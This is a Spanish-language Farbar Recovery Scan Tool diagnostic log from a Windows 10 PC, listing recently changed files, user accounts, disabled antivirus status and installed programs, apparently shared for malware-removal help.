2020-04-10 17:15 - 2007-04-04 18:55 - 000403304 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_7.dll
2020-04-10 17:15 - 2007-04-04 18:55 - 000261480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_7.dll
2020-04-10 17:15 - 2007-04-04 18:54 - 000107368 _____ (Microsoft Corporation) C:\WINDOWS\system32\xinput1_3.dll
2020-04-10 17:15 - 2007-04-04 18:53 - 000081768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xinput1_3.dll
2020-04-10 17:15 - 2007-03-15 16:57 - 000506728 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10_33.dll
2020-04-10 17:15 - 2007-03-15 16:57 - 000443752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_33.dll
2020-04-10 17:15 - 2007-03-12 16:42 - 004494184 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_33.dll
2020-04-10 17:15 - 2007-03-12 16:42 - 003495784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_33.dll
2020-04-10 17:15 - 2007-03-12 16:42 - 001400176 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_33.dll
2020-04-10 17:15 - 2007-03-12 16:42 - 001123696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_33.dll
2020-04-10 17:14 - 2007-01-24 15:27 - 000393576 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_6.dll
2020-04-10 17:14 - 2007-01-24 15:27 - 000255848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_6.dll
2020-04-10 17:14 - 2006-12-08 12:02 - 000251672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_5.dll
2020-04-10 17:14 - 2006-12-08 12:00 - 000390424 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_5.dll
2020-04-10 17:14 - 2006-11-29 13:06 - 000469264 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx10.dll
2020-04-10 17:14 - 2006-11-29 13:06 - 000440080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10.dll
2020-04-10 17:13 - 2007-03-05 12:42 - 000015128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\x3daudio1_1.dll
2020-04-10 17:13 - 2006-09-28 16:05 - 003977496 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_31.dll
2020-04-10 17:13 - 2006-09-28 16:05 - 002414360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_31.dll
2020-04-10 17:13 - 2006-09-28 16:05 - 000237848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_4.dll
2020-04-10 17:13 - 2006-09-28 16:04 - 000364824 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_4.dll
2020-04-10 17:13 - 2006-07-28 09:31 - 000083736 _____ (Microsoft Corporation) C:\WINDOWS\system32\xinput1_2.dll
2020-04-10 17:13 - 2006-07-28 09:30 - 000363288 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_3.dll
2020-04-10 17:13 - 2006-07-28 09:30 - 000236824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_3.dll
2020-04-10 17:13 - 2006-07-28 09:30 - 000062744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xinput1_2.dll
2020-04-10 17:13 - 2006-05-31 07:24 - 000230168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_2.dll
2020-04-10 17:13 - 2006-05-31 07:22 - 000354072 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_2.dll
2020-04-10 17:13 - 2006-03-31 12:41 - 003927248 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_30.dll
2020-04-10 17:13 - 2006-03-31 12:40 - 002388176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_30.dll
2020-04-10 17:13 - 2006-03-31 12:40 - 000352464 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_1.dll
2020-04-10 17:13 - 2006-03-31 12:39 - 000229584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_1.dll
2020-04-10 17:13 - 2006-03-31 12:39 - 000083664 _____ (Microsoft Corporation) C:\WINDOWS\system32\xinput1_1.dll
2020-04-10 17:13 - 2006-03-31 12:39 - 000062672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xinput1_1.dll
2020-04-10 17:13 - 2006-02-03 08:43 - 003830992 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_29.dll
2020-04-10 17:13 - 2006-02-03 08:43 - 002332368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_29.dll
2020-04-10 17:13 - 2006-02-03 08:42 - 000355536 _____ (Microsoft Corporation) C:\WINDOWS\system32\xactengine2_0.dll
2020-04-10 17:13 - 2006-02-03 08:42 - 000230096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xactengine2_0.dll
2020-04-10 17:13 - 2006-02-03 08:41 - 000016592 _____ (Microsoft Corporation) C:\WINDOWS\system32\x3daudio1_0.dll
2020-04-10 17:13 - 2006-02-03 08:41 - 000014032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\x3daudio1_0.dll
2020-04-10 17:13 - 2005-12-05 18:09 - 003815120 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_28.dll
2020-04-10 17:13 - 2005-12-05 18:09 - 002323664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_28.dll
2020-04-10 17:13 - 2005-07-22 19:59 - 003807440 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_27.dll
2020-04-10 17:13 - 2005-07-22 19:59 - 002319568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_27.dll
2020-04-10 17:13 - 2005-05-26 15:34 - 003767504 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_26.dll
2020-04-10 17:13 - 2005-05-26 15:34 - 002297552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_26.dll
2020-04-10 17:13 - 2005-03-18 17:19 - 003823312 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_25.dll
2020-04-10 17:13 - 2005-03-18 17:19 - 002337488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_25.dll
2020-04-10 17:13 - 2005-02-05 19:45 - 003544272 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3dx9_24.dll
2020-04-10 17:13 - 2005-02-05 19:45 - 002222800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx9_24.dll
2020-04-10 16:51 - 2020-04-11 14:10 - 000002168 _____ C:\Users\Public\Desktop\Vessel.lnk
2020-04-10 16:51 - 2020-04-10 16:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Strange Loop Games
2020-04-10 16:49 - 2020-04-10 16:49 - 000000000 ____D C:\Program Files (x86)\Strange Loop Games

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-05-10 11:50 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-05-10 10:24 - 2016-11-30 20:08 - 000000000 ____D C:\Users\Javi\AppData\LocalLow\Mozilla
2020-05-10 00:09 - 2019-08-19 23:05 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-05-09 22:29 - 2018-10-18 13:09 - 000000000 ____D C:\Users\Javi\Downloads\PELICULAS
2020-05-09 14:29 - 2019-08-19 23:37 - 001773366 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-05-09 14:29 - 2019-03-19 13:59 - 000789814 _____ C:\WINDOWS\system32\perfh00A.dat
2020-05-09 14:29 - 2019-03-19 13:59 - 000156068 _____ C:\WINDOWS\system32\perfc00A.dat
2020-05-09 14:29 - 2019-03-19 06:50 - 000000000 ____D C:\WINDOWS\INF
2020-05-09 14:25 - 2019-08-20 00:00 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-05-09 14:24 - 2019-03-19 06:37 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-05-09 14:24 - 2017-06-11 16:41 - 000065536 _____ C:\WINDOWS\psp_storage.bin
2020-05-09 13:08 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2020-05-09 13:08 - 2016-09-20 13:55 - 000000000 ____D C:\Program Files\Lenovo
2020-05-09 12:55 - 2016-11-30 20:03 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-05-09 12:37 - 2016-11-30 20:04 - 000001235 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-05-09 12:36 - 2017-01-11 16:52 - 000000000 ____D C:\Program Files (x86)\360
2020-05-08 15:36 - 2018-04-17 18:30 - 000000000 ____D C:\Users\Javi\AppData\Local\PlaceholderTileLogoFolder
2020-05-08 12:49 - 2019-03-19 06:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-05-08 12:44 - 2019-03-19 06:37 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2020-05-08 10:40 - 2017-08-29 21:12 - 000000000 ____D C:\Users\Javi\AppData\Roaming\WhatsApp
2020-05-08 10:37 - 2018-04-27 18:56 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-05-07 19:09 - 2018-05-27 20:28 - 000000000 ____D C:\Users\Javi\AppData\Local\D3DSCache
2020-05-07 16:41 - 2016-11-30 20:37 - 000000282 __RSH C:\ProgramData\ntuser.pol
2020-05-07 16:39 - 2019-08-19 12:02 - 000000000 ___DC C:\WINDOWS\Panther
2020-05-07 14:09 - 2017-02-12 10:30 - 000000000 ____D C:\Users\Javi\Documents\My Bluetooth
2020-05-07 13:53 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\NDF
2020-05-07 12:41 - 2017-02-12 11:49 - 000000000 __SHD C:\$360Section
2020-05-07 09:25 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps.tmp
2020-05-05 20:47 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-05-05 20:26 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\registration
2020-05-05 19:02 - 2015-10-30 09:24 - 000000155 _____ C:\WINDOWS\win.ini
2020-05-05 16:58 - 2019-08-19 23:23 - 000000000 ____D C:\Users\Javi
2020-05-05 12:03 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-05-04 15:10 - 2020-01-08 12:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre - E-book Management
2020-05-04 15:09 - 2020-01-08 12:10 - 000000000 ____D C:\Program Files (x86)\Calibre2
2020-05-04 14:18 - 2020-04-08 17:23 - 000000000 ____D C:\Users\Javi\Documents\PROGRAMAS
2020-05-04 10:36 - 2017-06-11 16:39 - 000000000 ____D C:\ProgramData\Package Cache
2020-05-03 20:15 - 2019-03-22 21:01 - 000000000 ____D C:\Users\Javi\AppData\Roaming\BitTorrent
2020-05-03 13:27 - 2018-05-20 15:44 - 000000000 ____D C:\Users\Javi\Downloads\FOTOS
2020-05-03 11:37 - 2019-05-16 10:36 - 000000000 ____D C:\Users\Javi\AppData\Local\WonderShare
2020-05-03 11:36 - 2019-05-04 11:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2020-05-03 11:32 - 2019-10-22 22:30 - 000000000 ____D C:\Program Files\Wondershare
2020-05-03 11:31 - 2019-05-04 11:12 - 000000000 ____D C:\Program Files (x86)\Wondershare
2020-05-03 11:15 - 2016-09-20 13:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-05-02 12:55 - 2018-05-20 19:20 - 000000000 ____D C:\Users\Javi\AppData\Roaming\HP Photo Creations
2020-05-02 11:45 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-05-02 11:34 - 2018-01-10 21:23 - 000000000 ____D C:\Users\Javi\AppData\Local\Packages
2020-05-01 21:26 - 2020-02-07 12:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Grass Valley
2020-05-01 21:26 - 2020-02-07 12:42 - 000000000 ____D C:\Program Files\Grass Valley
2020-05-01 19:50 - 2018-08-28 11:17 - 000000000 ____D C:\Users\Javi\.openshot_qt
2020-05-01 19:41 - 2016-11-30 19:57 - 000000000 ____D C:\Users\Javi\Documents\CONTRASEÑAS
2020-05-01 18:48 - 2020-02-05 20:10 - 000000000 ____D C:\Users\Javi\AppData\Local\Windows Live
2020-05-01 16:56 - 2016-11-28 17:11 - 000000000 ____D C:\Users\Javi\AppData\Local\VirtualStore
2020-04-30 18:30 - 2017-02-11 16:45 - 000000000 ____D C:\Users\Javi\Documents\EL TIEMPO
2020-04-30 10:34 - 2020-04-07 21:33 - 000000000 ____D C:\Program Files (x86)\UltraISO
2020-04-30 10:00 - 2017-08-29 21:12 - 000000000 ____D C:\Users\Javi\AppData\Local\WhatsApp
2020-04-28 16:08 - 2016-11-30 20:04 - 000000000 ____D C:\Users\Javi\AppData\Roaming\Mozilla
2020-04-28 15:25 - 2018-10-04 16:11 - 000000000 ____D C:\Users\Javi\dwhelper
2020-04-25 21:39 - 2019-05-31 20:34 - 000000583 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2020-04-25 14:19 - 2019-05-04 11:10 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2020-04-24 16:17 - 2019-08-20 00:00 - 000003542 _____ C:\WINDOWS\system32\Tasks\adobe acrobat update task
2020-04-24 16:15 - 2017-01-11 17:22 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-04-22 16:27 - 2020-02-05 20:26 - 000000000 ____D C:\Users\Javi\Tracing
2020-04-22 10:14 - 2016-11-28 17:31 - 000000000 ____D C:\Users\Javi\AppData\Local\Lenovo
2020-04-19 10:02 - 2019-08-20 00:00 - 000004616 _____ C:\WINDOWS\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-04-19 10:02 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-04-19 10:02 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-04-19 10:01 - 2016-12-03 00:37 - 000000000 ____D C:\Users\Javi\AppData\Local\Adobe
2020-04-16 17:26 - 2017-03-24 16:44 - 000744808 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2020-04-16 17:16 - 2019-08-19 23:05 - 000493528 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-04-16 17:12 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SystemResources
2020-04-16 17:12 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2020-04-16 17:12 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-04-16 17:12 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\ShellExperiences
2020-04-16 17:12 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\Provisioning
2020-04-16 17:12 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-04-16 17:10 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-04-15 16:45 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\ServiceState
2020-04-14 16:56 - 2020-01-08 21:29 - 000000000 ____D C:\Users\Javi\Biblioteca de calibre
2020-04-14 16:55 - 2019-08-20 19:44 - 000000000 ____D C:\Users\Javi\AppData\Local\cache
2020-04-14 14:56 - 2019-10-16 21:49 - 000000000 ____D C:\Users\Javi\Downloads\VARIOS
2020-04-14 14:48 - 2020-03-15 12:39 - 000000000 ____D C:\Users\Javi\Documents\LIBROS
2020-04-14 10:56 - 2019-10-23 16:26 - 000000000 ____D C:\Program Files\Recuva
2020-04-11 14:11 - 2020-04-08 19:49 - 000000000 ____D C:\Users\Javi\AppData\Local\SKIDROW

==================== Archivos en la raíz de algunos directorios ========

2017-07-17 11:36 - 2017-07-17 11:36 - 000000268 ____H () C:\Users\Javi\AppData\Roaming\Electric Piano
2017-07-17 16:06 - 2017-07-17 16:06 - 000000268 ____H () C:\Users\Javi\AppData\Roaming\Enhance Timing
2017-07-17 11:36 - 2017-07-17 11:36 - 000000268 ____H () C:\Users\Javi\AppData\Roaming\Enhance Tuning
2016-11-28 17:11 - 2020-05-10 10:24 - 006944076 _____ () C:\Users\Javi\AppData\Local\BTServer.log
2019-05-25 09:42 - 2020-01-23 21:19 - 000012288 _____ () C:\Users\Javi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-10-31 22:02 - 2017-10-31 22:02 - 000000001 _____ () C:\Users\Javi\AppData\Local\llftool.4.25.agreement
2017-10-08 13:45 - 2017-10-08 13:45 - 000000001 _____ () C:\Users\Javi\AppData\Local\llftool.4.30.agreement
2020-04-03 20:12 - 2020-04-03 20:12 - 000000001 _____ () C:\Users\Javi\AppData\Local\llftool.4.40.agreement

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)

==================== Final de FRST.txt ========================

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 10-05-2020 01
Ejecutado por Javi (10-05-2020 11:57:34)
Ejecutado desde C:\Users\Javi\Downloads
Windows 10 Home Versión 1909 18363.778 (X64) (2019-08-19 22:01:48)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-290510076-2018776080-814419295-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-290510076-2018776080-814419295-503 - Limited - Disabled)
Invitado (S-1-5-21-290510076-2018776080-814419295-501 - Limited - Disabled)
Javi (S-1-5-21-290510076-2018776080-814419295-1001 - Administrator - Enabled) => C:\Users\Javi
WDAGUtilityAccount (S-1-5-21-290510076-2018776080-814419295-504 - Limited - Disabled)

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

Adams Venture Origins (HKLM-x32\...\Adams Venture Origins_is1) (Version:  - )
Adobe Acrobat Reader DC - Español (HKLM-x32\...\{AC76BA86-7AD7-1034-7B44-AC0F074E4100}) (Version: 20.006.20042 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.363 - Adobe)
Alcor Micro Smart Card Reader Driver (HKLM-x32\...\{F24F876B-7D71-4BD6-88E9-614D3BB84210}) (Version: 1.7.2.0 - ) Hidden
Amazon Kindle (HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\Amazon Kindle) (Version: 1.27.0.56109 - Amazon)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 19.8.1 - Advanced Micro Devices, Inc.)
Assassin's Creed II (HKLM-x32\...\Uplay Install 4) (Version:  - Ubisoft)
AutoFirma (HKLM-x32\...\AutoFirma ) (Version: 1.5.0.JAv01 - Junta de Andalucía)
BitTorrent (HKU\S-1-5-21-290510076-2018776080-814419295-1001\...\BitTorrent) (Version: 7.10.5.45597 - BitTorrent Inc.)
Branding64 (HKLM\...\{EE2AFCE4-0238-4DE0-A140-1647021627C1}) (Version: 1.00.0001 - Advanced Micro Devices, Inc.) Hidden
calibre (HKLM-x32\...\{55043EFA-2201-40F4-86CA-CC465251D9DC}) (Version: 4.14.0 - Kovid Goyal)
Catalyst Control Center Next Localization BR (HKLM\...\{3E245378-BF77-6946-C6F6-096DBE5EAB82}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{D85E17DE-3C5D-73AE-0406-50BF3C4D5AD1}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (HKLM\...\{E7AA1A02-575C-14C6-FBEF-4BE6D46A5B74}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{45907537-804A-514F-5280-5F4F12A6DCBC}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{9FE3F5EA-AD28-9E85-6208-704CC5029A4A}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{EB6C44F1-0F78-FE10-BC63-90BA50AB0CE9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{962364E4-08BB-347D-32E7-2B789F37BF8A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{B26D75B8-FAB7-6F8B-767F-BAF975383D91}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{DBCD7E63-FD2F-2A93-952D-EE2F941BDF57}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{36EDC500-E4C0-371C-9865-08450415C1E9}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{A0407E39-2AA4-60B3-885F-3C5347B6909E}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{ECBE9F42-D6AE-8642-2C5A-83F8A4938461}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{0989D0EA-AFF3-5F9A-3D25-20EE133E409B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{3F213E40-BB7B-FF02-52F0-59EFE9E15475}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{4C2FB7FD-89FD-BA5C-585A-3811F326AD34}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{A8689A0F-5928-7300-B82B-C5E85131B7BA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{D74218A3-C503-57EF-AC9F-2220082E7ADE}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{E5EA5D70-80B4-89DE-1830-EA881F7FF635}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{730F7B3D-2ECB-B1E8-39CE-B52507A437AF}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{76AAF56B-93D8-161D-809A-EC05F3B913DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{DA433FCF-90A1-19A5-65A7-FDF82DE4826D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{063CED74-F5F0-870E-DC9C-2D78FDEDA3EE}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{70694147-A392-9E7E-DDA0-3A3CF7CD3F9F}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{949F125B-A6CC-5A5E-EEE7-4AC50305C1FA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{13BB60AA-88F7-4B1F-2DEC-D81EEDE8B3AA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{20D46801-147B-30AD-7C5A-AC4560A79096}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{652983CD-44DB-E54C-127F-37DA4227734B}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{03DE1911-58E2-164D-B345-4FB51057A6EA}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{22C39711-2747-D264-319A-1550BEEAAEC6}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{37AA6227-FF2C-95AC-87C0-45DCC0BB87DA}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{1DBACFDB-5E43-7882-36BD-53526D34BD22}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{41C01CCC-BE3F-1D02-CF64-5F6625290174}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{EB328356-1DF0-1CCE-3607-6361DD329219}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{667014B6-C826-15B4-A935-59C8CAEE1658}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{87E6EC29-AEC5-28CB-F773-93EB6C1B8A2B}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{A91FC4BF-C1EC-ADCA-79D1-F4F0671F1D60}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{2DC5E0C6-CDDC-5D3E-93F8-BAD9C570B440}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{CA55697D-BD74-3ED8-6B21-D7EDAD3B7D02}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{ED75A775-03A7-F214-868D-497748707968}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{07BFBD5C-2F63-6828-1B61-B41A44113F3B}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{60E496AE-EB6F-C99F-B279-82040047A03A}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{CFC860C8-4F51-E08C-A74C-2E444ED06160}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{24B01174-E234-7052-A933-8AE01774A198}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{9338D693-38B7-1ED4-9B42-BFA1D5600CCB}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{E6038D3E-5D87-8DF7-6D05-BE7532C3E73E}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{C971C145-258D-6650-7088-13DDB161327A}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{D650EDAA-D6F1-A1EF-2274-5A6FF582300E}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{DFAD9DAC-4768-C8BB-4E0E-5239605A9BEA}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{EBA09DAF-14B4-7BE7-676E-6E2FB21EDBDD}) (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FDB6778F-05B8-CEFD-C4AC-68F0A3123818}) (Version: 2016.0429.741.11944 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{FFBFBD1F-B160-A119-7C43-8584FA2E5665}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{4D1D5407-9B69-6422-629C-8518A26004A4}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
